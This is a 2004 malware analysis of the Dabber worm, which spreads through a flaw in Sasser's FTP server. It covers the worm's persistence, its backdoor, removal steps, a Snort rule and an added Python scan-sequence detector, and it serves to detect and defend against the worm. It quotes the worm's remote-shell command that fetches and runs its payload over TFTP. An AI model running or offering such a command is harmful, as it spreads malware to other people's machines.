Dabber Worm Analysis
- URL: http://www.secureworks.com/research/threats/dabber
- Date: May 13, 2004
- Author: Joe Stewart
SecureWorks' research team has discovered a new worm exploiting a vulnerability in the FTP server component of the Sasser worm. This worm will only infect users already infected by Sasser. Even though we have seen worms utilize backdoors left behind by other worms, this is the first time we have seen a worm using a vulnerability in another worm in order to propagate. We have named this worm "Dabber".
Update: May 14, 2004
Third-party analysis has indicated that Dabber is related to the Doomran worm discovered in March. Doomran had a similar method of operation, infecting hosts through the backdoor left by the Mydoom email virus; however, it merely used the Mydoom backdoor protocol instead of exploiting a vulnerability. It is likely that much of the worm code was reused by the author to create Dabber, substituting the Sasser-FTP exploit for the Mydoom backdoor upload code and adding the ability to remove Sasser.
Correlations between scans on port 3127 (Mydoom backdoor) and port 9898 (Dabber/Doomran backdoor) were noted as early as February, but because no complete analysis of Doomran was available, the connection between the port 9898 activity and Doomran was not established until now.
File Details
Name: package.exe
Size: 29,696 bytes
MD5: 149dd119425ec801fbca6237413db631
PE compile time: Wed May 12 00:46:01 2004
The worm incorporates code from the Sasser-FTP exploit recently released by "mandragore" of the Romanian Security Research team. The worm scans for Sasser-infected hosts on port 5554. When it finds one, it uses the exploit to temporarily bind a Windows command shell to port 8967. The worm then connects to the victim host on that port and issues the following command:
tftp -i [infecting host ip] GET hello.all package.exe & package.exe & exit
The worm has a built-in TFTP server used to transfer its executable to the target system. When the command above runs on the victim, the file is fetched over TFTP from the infecting host (stored there under the name hello.all), written as "package.exe" and executed.
When executed, the worm takes the following steps:
- Copies itself to Startup folders and the Windows system directory.
- Creates a mutex named "sas4dab" to ensure only one worm process runs in memory.
- Installs a registry key to run at boot:
In SOFTWARE\Microsoft\Windows\CurrentVersion\Run:
sassfix -> %WINDIR%\package.exe
- Deletes a list of registry keys of Sasser and other viruses:
From SOFTWARE\Microsoft\Windows\CurrentVersion\Run:
CLSID\{E6FB5E20-DE35-11CF-9C87-00AA005127ED}\InProcServer32
Gremlin
Taskmon
Video
avserve
avvserrve32
avserve2.exe
lsasss.exe
lsasss
ssgrate.exe
ssgrate
drvsys.exe
drvsys
Drvddll_exe
Drvddll.exe
Microsoft Update
windows
Windows Drive Compatibility
Generic Host Service
skynetave.exe
navapsrc.exe
lsasss.exe
drvddll.exe
ssgrate.exe
WinMsrv32
soundcontrl
System Updater Service
BagleAV
MapiDrv
SkynetRevenge
TempCom
Video Process
Window
From SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices:
windows
Windows Drive Compatibility
Generic Host Service
skynetave.exe
navapsrc.exe
lsasss.exe
drvddll.exe
ssgrate.exe
WinMsrv32
soundcontrl
System Updater Service
BagleAV
MapiDrv
SkynetRevenge
TempCom
Video Process
Window
- Sets up a TFTP server used to transfer the worm code to target systems
- Sets up a backdoor listener on TCP port 9898. An authenticated backdoor user can download additional code, execute processes on the infected system and get statistics about how many additional hosts have been infected by the local worm process.
From a network standpoint, the exploit process looks slightly different from an interactive run of the public exploit code. The worm first connects to TCP port 5554 and sends a single byte, an ASCII "C". If that connection succeeds, it reconnects to port 5554 and sends the exploit. After the exploit has been sent, the worm attempts to connect to TCP port 9898 on the target, again sending an ASCII "C", to confirm that the infection succeeded. If the connection to port 9898 succeeds, an internal tally is incremented, presumably so that statistics can be retrieved later through the backdoor. A single source host connecting to port 5554 and then to port 9898 on the same target, in that order, is an indicator that the source is infected; if the port 9898 connection succeeds, the target is now infected as well.
Removal
Kill the package.exe process using the Windows Task Manager. Remove the "sassfix" registry value from the Run key. Delete package.exe from the Windows system directory and all Startup folders. Because Dabber can only reach hosts that were already running Sasser, a cleaned host should also be checked for Sasser remnants and patched against the LSASS vulnerability (MS04-011) that Sasser exploits; otherwise it remains open to reinfection by Sasser and, through it, by Dabber.
Snort Signatures
The following Snort signature detects the exploit used by the worm. It matches a payload to TCP port 5554 that begins with an FTP PORT command and exceeds 150 bytes; legitimate PORT commands are only a few dozen bytes long and port 5554 is not a standard FTP port, so false positives should be rare. Note that the rule fires on the exploit stage, not on the one-byte "C" probe that precedes it, so a probe-only scan from a host that never sends the exploit will not alert.
alert tcp any any -> any 5554 (msg:"Sasser FTP exploit attempt"; flow:to_server,established; content:"PORT "; depth:5; dsize:>150; classtype:attempted-admin; reference:url,www.secureworks.com/research/threats/dabber; sid:1000105; rev:1;)
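The following detector, added here as an example and not code from the SecureWorks analysis, ties the two observations above together: it replays the probe/exploit/confirm sequence described in the network section over connection records and uses the Snort rule's own criteria (payload starting with "PORT ", longer than 150 bytes) to recognise the exploit stage. The record layout, the sample connections and the filler exploit payload are constructed for this example and are not from the original page.

```python
"""Dabber scan-sequence detector over constructed connection records.

Added example; not code from the SecureWorks analysis. It encodes the
exchange the write-up describes: a one-byte "C" probe to TCP/5554, a second
connection to 5554 carrying the exploit (matched with the same criteria as
the Snort rule: payload starts with "PORT " and exceeds 150 bytes), and a
final "C" to TCP/9898 that confirms the new infection. The record layout
and the sample data below are assumptions made for this example.
"""
from collections import defaultdict
from typing import Iterable, NamedTuple, Optional


class Conn(NamedTuple):
    ts: float        # time the connection was established
    src: str         # client (the scanning host)
    dst: str         # server (the scanned host)
    dport: int       # destination TCP port
    payload: bytes   # first bytes the client sent on this connection


SASSER_FTP_PORT = 5554
DABBER_BACKDOOR_PORT = 9898
PROBE = b"C"


def matches_sasser_ftp_rule(payload: bytes) -> bool:
    """Mirror of the Snort rule: content "PORT " at depth 5 and dsize > 150."""
    return payload[:5] == b"PORT " and len(payload) > 150


def classify_pair(conns: Iterable[Conn]) -> Optional[str]:
    """Walk one (src, dst) pair's connections in time order.

    Returns "infected" if probe, exploit and backdoor confirmation were all
    seen, "attempted" if the exploit was sent but the 9898 check never
    connected, and None otherwise.
    """
    state = 0  # 0 nothing, 1 probe, 2 exploit, 3 backdoor confirmation
    for c in sorted(conns, key=lambda c: c.ts):
        if state == 0 and c.dport == SASSER_FTP_PORT and c.payload == PROBE:
            state = 1
        elif state == 1 and c.dport == SASSER_FTP_PORT and matches_sasser_ftp_rule(c.payload):
            state = 2
        elif state == 2 and c.dport == DABBER_BACKDOOR_PORT and c.payload == PROBE:
            state = 3
            break
    return {2: "attempted", 3: "infected"}.get(state)


def find_dabber_activity(records: Iterable[Conn]) -> dict:
    """Map each (src, dst) pair showing Dabber activity to its verdict."""
    by_pair = defaultdict(list)
    for r in records:
        by_pair[(r.src, r.dst)].append(r)
    verdicts = {}
    for pair, conns in by_pair.items():
        verdict = classify_pair(conns)
        if verdict:
            verdicts[pair] = verdict
    return verdicts


# Constructed sample. Only established connections produce a record, so a
# refused 9898 connect (target not infected) simply never appears.
EXPLOIT = b"PORT " + b"A" * 200   # filler stand-in for the real exploit payload
SAMPLE = [
    Conn(1.0, "10.0.0.5", "10.0.0.20", 5554, b"C"),
    Conn(1.1, "10.0.0.5", "10.0.0.20", 5554, EXPLOIT),
    Conn(1.6, "10.0.0.5", "10.0.0.20", 9898, b"C"),        # infection confirmed
    Conn(2.0, "10.0.0.5", "10.0.0.21", 5554, b"C"),
    Conn(2.1, "10.0.0.5", "10.0.0.21", 5554, EXPLOIT),     # no 9898 follow-up
    Conn(3.0, "10.0.0.7", "10.0.0.20", 5554, b"USER anonymous\r\n"),  # ordinary FTP client
    Conn(4.0, "10.0.0.8", "10.0.0.22", 9898, b"C"),        # 9898 alone is not enough
]

if __name__ == "__main__":
    for (src, dst), verdict in sorted(find_dabber_activity(SAMPLE).items()):
        print(f"{src} -> {dst}: {verdict}")
```

Any source that reaches the "attempted" or "infected" state is itself a Dabber host, since only the worm sends this sequence; the verdict on the destination is what the 9898 confirmation adds. The state machine deliberately ignores a lone 9898 probe and a 5554 connection carrying an ordinary FTP command, so a single 5554 scan from a vulnerability scanner will not be mistaken for the worm.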